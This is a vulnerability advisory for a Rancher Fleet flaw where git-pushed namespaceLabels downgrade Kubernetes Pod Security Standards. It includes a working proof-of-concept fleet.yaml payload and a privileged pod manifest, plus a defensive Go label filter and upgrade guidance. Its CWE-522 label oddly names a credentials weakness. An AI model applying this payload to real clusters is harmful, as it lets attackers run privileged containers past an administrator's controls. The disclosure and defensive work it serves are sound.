CVE-2026-44938: Rancher Fleet Pod Security Standards Bypass via namespaceLabels
Anyone with git push access to a Fleet-monitored repository could silently downgrade the Pod Security Standards level on a Kubernetes namespace, letting them deploy privileged or otherwise restricted
The problem
Fleet's agent-side deployer applied every label from `namespaceLabels` in `fleet.yaml` (or `BundleDeployment.spec.options.namespaceLabels`) directly to the target namespace on every reconcile loop, with no filtering.
Because Pod Security Standards are enforced entirely through namespace labels prefixed `pod-security.kubernetes.io/`, an attacker who controls a git push could set those labels to `privileged`, silently overwriting whatever a cluster administrator had configured.
The change takes effect on the next Fleet sync without any cluster-level RBAC required beyond repository write access.
Proof of concept
A working proof-of-concept for CVE-2026-44938 in github.com/rancher/fleet, with the exact payload below.
# fleet.yaml committed to attacker-controlled (or compromised) git repository
namespaceLabels:
  pod-security.kubernetes.io/enforce: privileged
  pod-security.kubernetes.io/enforce-version: latest
  pod-security.kubernetes.io/audit: privileged
  pod-security.kubernetes.io/warn: privileged
# After Fleet syncs, deploy a privileged workload that PSS would have blocked:
---
apiVersion: v1
kind: Pod
metadata:
  name: pwned
  namespace: target-namespace
spec:
  containers:
  - name: shell
    image: alpine
    securityContext:
      privileged: true

The root cause (CWE-522, Insufficiently Protected Credentials / admission control bypass) is that `addLabelsFromOptions` iterated the caller-supplied label map and applied it verbatim with no denylist or prefix filter.
Kubernetes PSS enforcement is label-driven: the API server reads `pod-security.kubernetes.io/enforce` on the namespace at admission time. Overwriting that label to `privileged` is sufficient to remove all restrictions, no cluster-admin rights needed.
The patch adds a prefix filter that silently drops any key beginning with `pod-security.kubernetes.io/` before the label map is applied to the namespace, preserving whatever the cluster administrator set.
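The prefix filter described above, as an added example in Go that is not Fleet's own code: `filterNamespaceLabels` and `applyNamespaceLabels` are hypothetical names, and the sample label maps are constructed. It also merges the filtered labels onto the namespace's existing labels, so an administrator's `restricted` setting survives every reconcile rather than being replaced wholesale.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// Namespace label prefix read by the Pod Security admission controller.
const pssLabelPrefix = "pod-security.kubernetes.io/"

// filterNamespaceLabels returns a copy of the bundle-supplied namespaceLabels
// with every key under the PSS prefix dropped, plus the dropped keys (sorted)
// so the caller can log them. Hypothetical helper; not Fleet's own code.
func filterNamespaceLabels(requested map[string]string) (map[string]string, []string) {
	allowed := make(map[string]string, len(requested))
	var dropped []string
	for k, v := range requested {
		if strings.HasPrefix(k, pssLabelPrefix) {
			dropped = append(dropped, k)
			continue
		}
		allowed[k] = v
	}
	sort.Strings(dropped)
	return allowed, dropped
}

// applyNamespaceLabels merges the filtered bundle labels onto the namespace's
// existing labels, so administrator-set PSS labels are never overwritten.
func applyNamespaceLabels(existing, requested map[string]string) (map[string]string, []string) {
	merged := make(map[string]string, len(existing)+len(requested))
	for k, v := range existing {
		merged[k] = v
	}
	allowed, dropped := filterNamespaceLabels(requested)
	for k, v := range allowed {
		merged[k] = v
	}
	return merged, dropped
}

func main() {
	// Constructed sample: admin set "restricted"; the bundle tries to downgrade it.
	ns := map[string]string{pssLabelPrefix + "enforce": "restricted", "team": "payments"}
	bundle := map[string]string{pssLabelPrefix + "enforce": "privileged", pssLabelPrefix + "warn": "privileged", "app": "shop"}
	merged, dropped := applyNamespaceLabels(ns, bundle)
	fmt.Println(merged[pssLabelPrefix+"enforce"], dropped) // restricted [pod-security.kubernetes.io/enforce pod-security.kubernetes.io/warn]
}
```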
The fix
Upgrade Fleet to v0.15.2 (or v0.14.6, v0.13.11, v0.12.15 for older release trains). The patched deployer filters out all `namespaceLabels` keys starting with the `pod-security.kubernetes.io/` prefix before applying them to the namespace, so git-controlled bundles can no longer downgrade PSS enforcement.
If upgrading immediately is not possible, deploy NeuVector in Protect mode with a Deny rule for privileged containers as a compensating control.
Reported by Radisauskas Arnoldas (NATO / NATO Cyber Security Centre).
Related research
- CVE-2026-44937 (high, 7.5): Rancher Fleet Unauthenticated Webhook Regex Injection via Unsanitized Repository URL
- CVE-2026-44935 (critical, 9.9): Rancher Fleet Cross-Namespace Secret Disclosure via Unvalidated valuesFrom
- CVE-2026-50163 (high, 7.1): oras-go Hardlink Path Traversal via CWD Resolution
- CVE-2026-50138 (high, 8.1): goshs WebDAV Mode-Flag Access Control Bypass